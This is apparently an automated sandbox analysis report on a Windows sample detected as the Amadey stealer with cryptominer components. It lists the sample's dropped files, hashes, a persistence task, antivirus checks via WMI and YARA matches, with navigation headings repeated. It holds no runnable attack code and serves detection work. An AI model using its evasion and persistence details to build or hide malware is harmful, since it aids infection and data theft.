Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 6_2_00C3CB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

6_2_00C3CB1A

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 6_2_00C265B0 LookupAccountNameA,

6_2_00C265B0

Source: C:\Windows\System32\cscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 2.2.axplong.exe.c20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.axplong.exe.c20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.960000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.axplong.exe.c20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000003.1746285062.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.2302324520.0000000004CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1763005271.0000000000961000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1749088265.0000000005340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1722139585.0000000004AA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1789363065.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1789584314.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3020960898.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY

Windows Analysis Report
file.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Cryptography

Bitcoin Miner

Compliance

Networking

DDoS

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

ID:	1520638
Product:	CloudBasic
Start time:	17:40:07
Start date:	27.09.2024
Sample:	file.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	dc730eea0eba910485703a74d173f8e2
SHA1:	093f63548d7366b6c3cbfc3ddfca453199e40eca
SHA256:	18894a1a879e0e75c33ec7988c8835b20b42a3fae8c51f1cb4f026f2b855a6b7
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\miner2.0.exe.log	CSV text	FC3575D5BE1A5405683DC33B66D36243	1C816D34B7D5B96E077DC3EF640BA8C7BA370502	1D7F7FBA862417A1D0351C1BF454F1A9BB0ED7FFD5DF1112EED802C01BDDA50C
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\services64.exe.log	CSV text	FC3575D5BE1A5405683DC33B66D36243	1C816D34B7D5B96E077DC3EF640BA8C7BA370502	1D7F7FBA862417A1D0351C1BF454F1A9BB0ED7FFD5DF1112EED802C01BDDA50C
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\sihost64.exe.log	CSV text	F73EF0CF34F9748349B7DC26D23369A1	9F1AA6A1896EE82B13E910AFF27CB179ECAA77B5	6B8272C1059743AA45FBEB2E303FEFB6F591D3D374FB78252432881E38E21EFD
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost64.exe.log	ASCII text, with CRLF line terminators	D9CA89A021349720070D9515234EA98F	6250FA94AB1D87D655C60185FACC639EE1E0B929	08757D7C558DCA49E7A21644675009292CBA4DF6624FB85B6DF0E90E7198D6A4
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\loader_5879465914[1].exe	PE32+ executable (GUI) x86-64, for MS Windows	7DF3608AE8EA69762C71DA1C05F0C043	164A36D4822BE3FD4111CDEF5CECAD5F19024564	ECF9B0828798392080348E096E843458267B9DF11EBC035ECD9C738BB69DB470
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	446DD1CF97EABA21CF14D03AEBC79F27	36E4CC7367E0C7B40F4A8ACE272941EA46373799	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	PE32+ executable (GUI) x86-64, for MS Windows	7DF3608AE8EA69762C71DA1C05F0C043	164A36D4822BE3FD4111CDEF5CECAD5F19024564	ECF9B0828798392080348E096E843458267B9DF11EBC035ECD9C738BB69DB470
C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	PE32 executable (GUI) Intel 80386, for MS Windows	DC730EEA0EBA910485703A74D173F8E2	093F63548D7366B6C3CBFC3DDFCA453199E40ECA	18894A1A879E0E75C33EC7988C8835B20B42A3FAE8C51F1CB4F026F2B855A6B7
C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe:Zone.Identifier	ASCII text, with CRLF line terminators	187F488E27DB4AF347237FE461A079AD	6693BA299EC1881249D59262276A0D2CB21F8E64	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	PE32+ executable (GUI) x86-64, for MS Windows	7DF3608AE8EA69762C71DA1C05F0C043	164A36D4822BE3FD4111CDEF5CECAD5F19024564	ECF9B0828798392080348E096E843458267B9DF11EBC035ECD9C738BB69DB470
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_02hfu414.g3e.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0jx2i0vc.koj.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1lquwdk3.nnf.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1sw33nuf.jy0.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2gsrsrja.otm.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2um1ksua.x0s.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2xny5hdv.suy.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_31duozca.a5x.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_32diwoqo.zw0.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_41hzin4b.qnl.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4gidlnea.ioj.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4qg3ylqg.thb.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_52ry0z4r.krq.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5lvba4oa.lzy.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bcp1dl5w.ic2.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_brubbskd.pmu.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bts5qy3n.dum.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cq2y13qs.05z.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_filg3bsn.kem.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fxvreusi.1sl.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gvskkmcc.jaj.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hpmlhrna.tyu.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i02hwxoy.f3q.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jkkpn3xr.jvc.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kiblwhx0.4lb.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_le3d3htk.z3y.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mbnsteeo.d1v.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mmogvf2g.cnm.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nc0uracz.ybw.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nwzt31qj.w0n.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_obwtrypu.yot.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_olgk2ovd.h1z.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pg1w0tfz.adz.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pnasfq31.j1w.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_regrbua4.eyv.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rojvywag.cf5.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sogqcheu.p1k.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sqrvq2m1.2c2.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tkkejrq4.la2.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tw5xsb3k.02t.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vokszajx.bpx.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wennl4vp.ldk.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wfnmin1d.o05.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wsmpyfit.gke.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wvbc1o0h.dar.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xizpgnqk.kfe.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y5qqkr2y.gq5.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zhyndefk.d02.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\conf.vbs	ASCII text	218C7FCF8EAEFB826A73316798728FA6	11E726ED3FAFE4DF0294EBF79762CD738F23DB0B	9BF121B6678247E3A940BAB11800060D34AB2C351A85B99BD48B9526067A3C0E
C:\Users\user\AppData\Local\Temp\miner2.0.exe	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows	651396CF297F15A1F92EE0A29E27C4EA	695EA25EC711D8742399918D0A769151BF44D1A1	A649E59EA0F6FBA416D10DCD03900EA7BBEE9C2207F46B23E1BA270FF052BFF1
C:\Users\user\AppData\Local\Temp\svchost64.exe	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows	A8638A5105C9A663B0D6918D64B3AD21	F35B98542E4E66FCE0008E7879D82BE48698380C	F795AF49314300157ABF6CBD67B115DD0CD4AD4255E148489051D847FA847E85
C:\Windows\System32\Microsoft\Libs\WR64.sys	PE32+ executable (native) x86-64, for MS Windows	0C0195C48B6B8582FA6F6373032118DA	D25340AE8E92A6D29F599FEF426A2BC1B5217299	11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
C:\Windows\System32\Microsoft\Libs\sihost64.exe	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows	7112FD4E6B2CDD13C11B8B04A96769CB	1806D301DF0E9FFDA5CFCC76E8237D4C516D4A9E	D40E908BC1FF808DC0B6B3BB674E9DD425880C06F1DBC23C6796EACE385370BA
C:\Windows\System32\services64.exe	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows	651396CF297F15A1F92EE0A29E27C4EA	695EA25EC711D8742399918D0A769151BF44D1A1	A649E59EA0F6FBA416D10DCD03900EA7BBEE9C2207F46B23E1BA270FF052BFF1
C:\Windows\Tasks\axplong.job	data	08AA780ED052C566AEECB12B6DD445E9	E47AC5690977888F9398EC42690E4DD0E62DF82B	AC23B90BCD3DEE09FE6357DD0963CE814931D9C66E188F2CC61094C5B34FA02E
\Device\ConDrv	ASCII text, with CR, LF line terminators	4FB92084B3D98C91E11E366B62C1ECB6	2DB34F466698A87C6036FF803008EF4EAD25EAA6	44F02E748FC48EBF2E846798DA0DD204614796FAC663795B340697BA9ECDF0DA
\Device\Null	ASCII text, with CRLF line terminators	1441DF213253942408FB7892349549D0	2421D1DE1A34D83D4044A30EAC57824AF6978D45	099F17A7C5F91BE0BDD7A1D10E33A34BDBCE5E45AB8C9ABE1CCACDCF3805C23C

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Cryptography

Bitcoin Miner

Compliance

Networking

DDoS

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Windows Analysis Report
file.exe

Malware Threat Intel
Provided by